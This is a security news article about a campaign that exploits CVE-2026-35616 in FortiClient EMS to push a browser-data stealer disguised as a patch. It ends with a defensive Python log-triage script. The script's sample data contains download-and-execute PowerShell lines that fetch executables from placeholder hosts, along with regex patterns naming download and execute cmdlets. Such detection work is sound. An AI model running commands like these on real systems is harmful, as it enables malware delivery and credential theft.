Cybersecurity researchers have identified a campaign in which threat actors exploit a critical FortiClient Endpoint Management Server (EMS) vulnerability to push credential-stealing malware onto endpoints the server already manages.
The attack hinges on CVE-2026-35616, a high-severity flaw that lets an attacker bypass API authentication and gain elevated privileges in FortiClient EMS environments that have not been updated. Fortinet has released patches, but researchers report active exploitation in the wild against systems that remain unpatched.
According to the researchers, the attackers used the compromised EMS infrastructure itself to issue malicious commands to managed endpoints. Because the commands travel over trusted management pathways, the activity closely resembles routine administration, so defenders may miss it or at least have a harder time confirming what is happening.
Once access was obtained, the attackers reportedly modified endpoint policies and management settings so that malicious PowerShell scripts would run across connected devices. Because EMS centrally manages large numbers of machines, a single EMS compromise can extend its blast radius across an entire organization.
The chain described involves a legitimate FortiClient component launching scripts that download a malicious executable disguised as a software update. The file, named "FortiEndpoint_Patch.exe", is not a patch at all but information-stealing malware designed to harvest sensitive browser data.
Investigators found that the malware can steal passwords, cookies, saved login sessions, autofill entries, addresses, phone numbers, and stored payment card information from Chromium-based and Gecko-based browsers. The collected data is then packaged and exfiltrated to attacker-controlled infrastructure.
One of the most concerning aspects of the campaign is the potential for session hijacking. With stolen browser cookies and already-authenticated sessions, an attacker could access cloud services, business applications, and internal systems without repeatedly having to defeat multi-factor authentication, which is what makes this so worrying.
The incident shows how threat actors increasingly target management platforms and other trusted enterprise tools to maximize impact. Rather than compromising devices one at a time, attackers abuse centralized infrastructure to push malware everywhere in a coordinated, rapid way.
Organizations using FortiClient EMS are strongly advised to apply the latest security updates. Security teams should also review endpoint management policies, monitor PowerShell activity, and investigate any unexpected configuration changes. Where compromise is even suspected, they should consider rotating credentials and invalidating active sessions.
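As an added illustration of the "monitor PowerShell activity" advice (this is example code written for this page, not from the researchers or Fortinet), the following triages PowerShell script-block log entries and flags the download-then-execute pattern described in the campaign, including the reported "FortiEndpoint_Patch.exe" lure name. The log entries, hostnames and URLs are constructed samples.

```python
import re
from dataclasses import dataclass
from typing import Optional, List, Tuple

# Constructed samples modelled on PowerShell script-block logging (Event ID 4104)
# message text; hostnames and URLs are placeholders, not captured data.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("host-a", "Get-Process | Where-Object { $_.CPU -gt 100 }"),
    ("host-b", "Invoke-WebRequest -Uri http://update.example.invalid/FortiEndpoint_Patch.exe "
               "-OutFile $env:TEMP\\FortiEndpoint_Patch.exe; Start-Process $env:TEMP\\FortiEndpoint_Patch.exe"),
    ("host-c", "Start-Process -FilePath 'C:\\Program Files\\Fortinet\\FortiClient\\FortiClient.exe'"),
    ("host-d", "(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/agent.exe',"
               "'C:\\Users\\Public\\agent.exe'); & 'C:\\Users\\Public\\agent.exe'"),
]

# Cmdlets/methods that fetch content from the network, and ways of launching it.
DOWNLOAD = re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer|\biwr\b|\bcurl\b", re.I)
EXEC = re.compile(r"Start-Process|&\s*['\"]?[^'\"]+\.exe|Invoke-Expression|\biex\b", re.I)
# File name reported for the fake patch in this campaign.
KNOWN_LURE = re.compile(r"FortiEndpoint_Patch\.exe", re.I)


@dataclass
class Finding:
    host: str
    reason: str
    exe: Optional[str]


def _exe_name(script: str) -> Optional[str]:
    """First executable file name mentioned in the script block, if any."""
    m = re.search(r"([\w\-]+\.exe)", script, re.I)
    return m.group(1) if m else None


def analyze(host: str, script: str) -> Optional[Finding]:
    """Return a Finding when a script block fetches a payload from the network and runs it."""
    if KNOWN_LURE.search(script):
        return Finding(host, "reference to fake patch name from the reported campaign", _exe_name(script))
    if DOWNLOAD.search(script) and EXEC.search(script):
        return Finding(host, "download-then-execute of an executable", _exe_name(script))
    return None  # plain administration (e.g. host-c launching the real client) is not flagged


def triage(events: List[Tuple[str, str]]) -> List[Finding]:
    """Run analyze() over (host, script_block) pairs and keep only the hits."""
    return [f for f in (analyze(h, s) for h, s in events) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"{finding.host}: {finding.reason} ({finding.exe})")
```

Hits from hosts that should never receive EMS-pushed scripts, or that appear shortly after an unexplained EMS policy change, are the ones to escalate first.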
Security-focused organizations such as IntelligenceX continue to stress patch management, privileged access security, and continuous monitoring. They note that attackers are increasingly abusing trusted enterprise management systems to distribute malware and steal credentials, not merely to cause disruption.